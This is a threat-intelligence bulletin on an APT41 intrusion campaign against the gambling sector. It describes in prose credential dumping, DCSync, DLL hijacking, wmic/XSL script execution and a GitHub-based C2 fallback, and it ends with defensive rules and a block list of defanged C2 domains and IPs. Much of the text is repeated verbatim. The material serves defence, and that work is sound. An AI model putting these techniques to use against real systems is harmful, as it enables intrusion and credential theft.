Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
Summary:
APT41 (also known as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) launched a sophisticated cyberattack on the gambling and gaming industry. Over a span of six to nine months, the attackers gathered sensitive information such as network configurations, passwords, and data from the LSASS process. They adapted their methods in response to the security team's defenses, maintaining persistent access to the network. The attack, linked to "Operation Crimson Palace" by Sophos, aimed at financial gain, and relied on tactics that bypassed security software, enabling the theft of intellectual property and financial exploitation. A DCSync attack was used to obtain admin credentials, giving them broader access to the network. The threat actors also executed techniques like Phantom DLL Hijacking and used legitimate tools like wmic.exe for privilege escalation.
The campaign involved custom malware that connected to a command-and-control (C2) server. When this failed, it employed GitHub to retrieve new C2 information. A revised attack wave involved obfuscated JavaScript within a modified XSL file, executed through wmic.exe. The final stage involved profiling infected systems, particularly those within a specific VPN subnet, by filtering devices a specific IP addresses , targeting valuable machines.
Security Officer Comments:
In addition to the tactics employed by APT41, the attackers also leveraged several advanced techniques to ensure persistence and evade detection. One notable method was the use of Phantom DLL Hijacking, where the attackers replaced legitimate DLLs with malicious ones to execute code without raising suspicion. Furthermore, they used Living-off-the-Land Binaries (LOLBins), such as wmic.exe, to run malicious scripts while blending in with normal system activity. The attackers also implemented a sophisticated C2 fallback mechanism by dynamically generating new C2 servers via GitHub scraping, extracting encoded IP addresses from specific capital letters in user profiles. This technique allowed the attackers to maintain flexibility and redundancy in their infrastructure, making it harder for defenders to block or shut down communications.
Suggested Corrections:
Link(s):
https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html
https://www.securityjoes.com/post/t...ted-threat-actors-targeting-gambling-industry
APT41 (also known as Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) launched a sophisticated cyberattack on the gambling and gaming industry. Over a span of six to nine months, the attackers gathered sensitive information such as network configurations, passwords, and data from the LSASS process. They adapted their methods in response to the security team's defenses, maintaining persistent access to the network. The attack, linked to "Operation Crimson Palace" by Sophos, aimed at financial gain, and relied on tactics that bypassed security software, enabling the theft of intellectual property and financial exploitation. A DCSync attack was used to obtain admin credentials, giving them broader access to the network. The threat actors also executed techniques like Phantom DLL Hijacking and used legitimate tools like wmic.exe for privilege escalation.
The campaign involved custom malware that connected to a command-and-control (C2) server. When this failed, it employed GitHub to retrieve new C2 information. A revised attack wave involved obfuscated JavaScript within a modified XSL file, executed through wmic.exe. The final stage involved profiling infected systems, particularly those within a specific VPN subnet, by filtering devices a specific IP addresses , targeting valuable machines.
Security Officer Comments:
In addition to the tactics employed by APT41, the attackers also leveraged several advanced techniques to ensure persistence and evade detection. One notable method was the use of Phantom DLL Hijacking, where the attackers replaced legitimate DLLs with malicious ones to execute code without raising suspicion. Furthermore, they used Living-off-the-Land Binaries (LOLBins), such as wmic.exe, to run malicious scripts while blending in with normal system activity. The attackers also implemented a sophisticated C2 fallback mechanism by dynamically generating new C2 servers via GitHub scraping, extracting encoded IP addresses from specific capital letters in user profiles. This technique allowed the attackers to maintain flexibility and redundancy in their infrastructure, making it harder for defenders to block or shut down communications.
Suggested Corrections:
- Monitor and restrict any attempt to modify XSL files in the default Windows folder
C:\Windows\SysWOW64\wbem. - Monitor any attempt to use custom XSL files with the WMIC.exe utility. Validate the path of the XSL file passed in the /FORMAT parameter, ensuring it is approved by your
organization and has been analyzed beforehand. - Block all traffic to the domain time[.]qnapntp[.]com and IP addresses 23[.]163[.]0[.]12, 192[.]169[.]7[.]135.
- Monitor the usage of remote named pipes to detect lateral movement. C2 frameworks
that implement SMB beaconing often rely on this resource to connect even in environments without direct internet connectivity. - Monitor modifications of the Registry Key SYSTEM\ControlSet001\Services\LanmanServer\Parameters, especially when parameters such as NullSessionPipes and restrictnullsessaccess are set.
- Block any TCP traffic over port 443 that does not comply with the standard HTTPS protocol.
- Build custom rules in your EDR to detect and block the execution of any process that shares the following process hierarchy.
Link(s):
https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html
https://www.securityjoes.com/post/t...ted-threat-actors-targeting-gambling-industry